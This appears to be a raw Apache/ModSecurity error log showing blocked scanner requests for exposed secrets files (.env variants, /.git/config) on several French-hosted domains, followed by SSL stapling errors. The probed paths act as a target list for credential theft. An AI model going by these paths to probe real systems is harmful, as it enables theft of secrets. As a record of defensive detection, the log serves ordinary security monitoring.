[Mon May 11 13:32:30.298180 2026] [security2:error] [pid 1320674:tid 1320710] [client 213.209.159.223:11190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.rentparadise.fr"] [uri "/crm/.env"] [unique_id "agG-TqO9RdIr1DwxYR1vmAAAANU"]
[Mon May 11 13:32:30.633130 2026] [security2:error] [pid 1319885:tid 1319910] [client 213.209.159.223:11202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/crm/.env"] [unique_id "agG-TlchVQ3tCn0m9Oo0JAAAAQ0"]
[Mon May 11 13:32:30.633596 2026] [security2:error] [pid 1319885:tid 1319910] [client 213.209.159.223:11202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/crm/.env"] [unique_id "agG-TlchVQ3tCn0m9Oo0JAAAAQ0"]
[Mon May 11 13:32:30.925237 2026] [security2:error] [pid 1320674:tid 1320710] [client 213.209.159.223:11190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.rentparadise.fr"] [uri "/index.php"] [unique_id "agG-TqO9RdIr1DwxYR1vmAAAANU"]
[Mon May 11 13:32:30.986118 2026] [security2:error] [pid 1319953:tid 1319964] [client 213.209.159.223:11210] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /test/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.rentparadise.fr"] [uri "/test/.env"] [unique_id "agG-TuSQ-m-m0ukSShtd5gAAAUk"]
[Mon May 11 13:32:30.986361 2026] [security2:error] [pid 1319953:tid 1319964] [client 213.209.159.223:11210] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.rentparadise.fr"] [uri "/test/.env"] [unique_id "agG-TuSQ-m-m0ukSShtd5gAAAUk"]
[Mon May 11 13:32:31.270819 2026] [security2:error] [pid 1319885:tid 1319910] [client 213.209.159.223:11202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agG-TlchVQ3tCn0m9Oo0JAAAAQ0"]
[Mon May 11 13:32:31.322133 2026] [security2:error] [pid 1319886:tid 1319916] [client 213.209.159.223:11214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /test/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/test/.env"] [unique_id "agG-T6y-5-wpj6Sx56Z0tAAAAAs"]
[Mon May 11 13:32:31.322363 2026] [security2:error] [pid 1319886:tid 1319916] [client 213.209.159.223:11214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/test/.env"] [unique_id "agG-T6y-5-wpj6Sx56Z0tAAAAAs"]
[Mon May 11 13:32:31.614832 2026] [security2:error] [pid 1319953:tid 1319964] [client 213.209.159.223:11210] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.rentparadise.fr"] [uri "/index.php"] [unique_id "agG-TuSQ-m-m0ukSShtd5gAAAUk"]
[Mon May 11 13:32:31.675621 2026] [security2:error] [pid 1319885:tid 1319922] [client 213.209.159.223:11228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.rentparadise.fr"] [uri "/config/.env"] [unique_id "agG-T1chVQ3tCn0m9Oo0JgAAARI"]
[Mon May 11 13:32:31.675847 2026] [security2:error] [pid 1319885:tid 1319922] [client 213.209.159.223:11228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.rentparadise.fr"] [uri "/config/.env"] [unique_id "agG-T1chVQ3tCn0m9Oo0JgAAARI"]
[Mon May 11 13:32:31.949665 2026] [security2:error] [pid 1319886:tid 1319916] [client 213.209.159.223:11214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agG-T6y-5-wpj6Sx56Z0tAAAAAs"]
[Mon May 11 13:32:32.006089 2026] [security2:error] [pid 1320398:tid 1320421] [client 213.209.159.223:11236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/config/.env"] [unique_id "agG-UOJEyNRN152ArORl6QAAAFU"]
[Mon May 11 13:32:32.006323 2026] [security2:error] [pid 1320398:tid 1320421] [client 213.209.159.223:11236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/config/.env"] [unique_id "agG-UOJEyNRN152ArORl6QAAAFU"]
[Mon May 11 13:32:32.300189 2026] [security2:error] [pid 1319885:tid 1319922] [client 213.209.159.223:11228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.rentparadise.fr"] [uri "/index.php"] [unique_id "agG-T1chVQ3tCn0m9Oo0JgAAARI"]
[Mon May 11 13:32:32.354770 2026] [security2:error] [pid 1319953:tid 1319957] [client 213.209.159.223:11240] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bot/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.rentparadise.fr"] [uri "/bot/.env"] [unique_id "agG-UOSQ-m-m0ukSShtd5wAAAUI"]
[Mon May 11 13:32:32.354994 2026] [security2:error] [pid 1319953:tid 1319957] [client 213.209.159.223:11240] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.rentparadise.fr"] [uri "/bot/.env"] [unique_id "agG-UOSQ-m-m0ukSShtd5wAAAUI"]
[Mon May 11 13:32:32.622485 2026] [security2:error] [pid 1320398:tid 1320421] [client 213.209.159.223:11236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agG-UOJEyNRN152ArORl6QAAAFU"]
[Mon May 11 13:32:32.677224 2026] [security2:error] [pid 1319885:tid 1319915] [client 213.209.159.223:40540] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bot/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/bot/.env"] [unique_id "agG-UFchVQ3tCn0m9Oo0JwAAAQ8"]
[Mon May 11 13:32:32.677448 2026] [security2:error] [pid 1319885:tid 1319915] [client 213.209.159.223:40540] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/bot/.env"] [unique_id "agG-UFchVQ3tCn0m9Oo0JwAAAQ8"]
[Mon May 11 13:32:33.004750 2026] [security2:error] [pid 1319953:tid 1319957] [client 213.209.159.223:11240] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.rentparadise.fr"] [uri "/index.php"] [unique_id "agG-UOSQ-m-m0ukSShtd5wAAAUI"]
[Mon May 11 13:32:33.337963 2026] [security2:error] [pid 1319885:tid 1319915] [client 213.209.159.223:40540] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agG-UFchVQ3tCn0m9Oo0JwAAAQ8"]
[Mon May 11 13:32:33.727255 2026] [security2:error] [pid 1319885:tid 1319900] [client 213.209.159.223:40566] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save.1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.rentparadise.fr"] [uri "/.env.save.1"] [unique_id "agG-UVchVQ3tCn0m9Oo0KAAAAQk"]
[Mon May 11 13:32:33.727483 2026] [security2:error] [pid 1319885:tid 1319900] [client 213.209.159.223:40566] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.rentparadise.fr"] [uri "/.env.save.1"] [unique_id "agG-UVchVQ3tCn0m9Oo0KAAAAQk"]
[Mon May 11 13:32:34.062394 2026] [security2:error] [pid 1319886:tid 1319929] [client 213.209.159.223:40572] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save.1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/.env.save.1"] [unique_id "agG-Uqy-5-wpj6Sx56Z0twAAABM"]
[Mon May 11 13:32:34.062600 2026] [security2:error] [pid 1319886:tid 1319929] [client 213.209.159.223:40572] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/.env.save.1"] [unique_id "agG-Uqy-5-wpj6Sx56Z0twAAABM"]
[Mon May 11 13:32:34.362735 2026] [security2:error] [pid 1319885:tid 1319900] [client 213.209.159.223:40566] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.rentparadise.fr"] [uri "/index.php"] [unique_id "agG-UVchVQ3tCn0m9Oo0KAAAAQk"]
[Mon May 11 13:32:34.416213 2026] [security2:error] [pid 1319885:tid 1319932] [client 213.209.159.223:40582] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.rentparadise.fr"] [uri "/API/.env"] [unique_id "agG-UlchVQ3tCn0m9Oo0KQAAARY"]
[Mon May 11 13:32:34.416437 2026] [security2:error] [pid 1319885:tid 1319932] [client 213.209.159.223:40582] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.rentparadise.fr"] [uri "/API/.env"] [unique_id "agG-UlchVQ3tCn0m9Oo0KQAAARY"]
[Mon May 11 13:32:34.695565 2026] [security2:error] [pid 1319886:tid 1319929] [client 213.209.159.223:40572] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agG-Uqy-5-wpj6Sx56Z0twAAABM"]
[Mon May 11 13:32:34.748704 2026] [security2:error] [pid 1320674:tid 1320694] [client 213.209.159.223:40588] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/API/.env"] [unique_id "agG-UqO9RdIr1DwxYR1voAAAAMQ"]
[Mon May 11 13:32:34.748922 2026] [security2:error] [pid 1320674:tid 1320694] [client 213.209.159.223:40588] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/API/.env"] [unique_id "agG-UqO9RdIr1DwxYR1voAAAAMQ"]
[Mon May 11 13:32:35.059616 2026] [security2:error] [pid 1319885:tid 1319932] [client 213.209.159.223:40582] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.rentparadise.fr"] [uri "/index.php"] [unique_id "agG-UlchVQ3tCn0m9Oo0KQAAARY"]
[Mon May 11 13:32:35.389245 2026] [security2:error] [pid 1320674:tid 1320694] [client 213.209.159.223:40588] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agG-UqO9RdIr1DwxYR1voAAAAMQ"]
[Mon May 11 13:33:01.750551 2026] [security2:error] [pid 1320674:tid 1320694] [client 34.150.187.186:45174] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "krakoukas.com"] [uri "/.git/config"] [unique_id "agG-baO9RdIr1DwxYR1vvgAAAMQ"]
[Mon May 11 13:33:01.750916 2026] [security2:error] [pid 1320674:tid 1320694] [client 34.150.187.186:45174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "krakoukas.com"] [uri "/.git/config"] [unique_id "agG-baO9RdIr1DwxYR1vvgAAAMQ"]
[Mon May 11 13:33:02.525908 2026] [ssl:error] [pid 1319998:tid 1320006] (EAI 2)Name or service not known: [client 116.202.235.23:24220] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 13:33:02.526173 2026] [ssl:error] [pid 1319998:tid 1320006] AH01941: stapling_renew_response: responder error
[Mon May 11 13:33:02.608339 2026] [ssl:error] [pid 1320398:tid 1320405] (EAI 2)Name or service not known: [client 116.202.235.23:24228] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 13:33:02.608397 2026] [ssl:error] [pid 1320398:tid 1320405] AH01941: stapling_renew_response: responder error
[Mon May 11 13:33:03.463175 2026] [security2:error] [pid 1320674:tid 1320694] [client 34.150.187.186:45174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agG-baO9RdIr1DwxYR1vvgAAAMQ"]
[Mon May 11 13:33:03.617472 2026] [ssl:error] [pid 1319885:tid 1319907] (EAI 2)Name or service not known: [client 116.202.235.23:24238] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 13:33:03.617517 2026] [ssl:error] [pid 1319885:tid 1319907] AH01941: stapling_renew_response: responder error
[Mon May 11 13:33:04.224096 2026] [ssl:error] [pid 1319885:tid 1319889] (EAI 2)Name or service not known: [client 116.202.235.23:24250] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 13:33:04.224127 2026] [ssl:error] [pid 1319885:tid 1319889] AH01941: stapling_renew_response: responder error
[Mon May 11 13:33:19.153454 2026] [ssl:error] [pid 1319885:tid 1319904] (EAI 2)Name or service not known: [client 74.7.175.189:33306] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 13:33:19.153699 2026] [ssl:error] [pid 1319885:tid 1319904] AH01941: stapling_renew_response: responder error
[Mon May 11 13:33:35.033709 2026] [ssl:error] [pid 1319886:tid 1319901] (EAI 2)Name or service not known: [client 108.177.2.9:48280] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
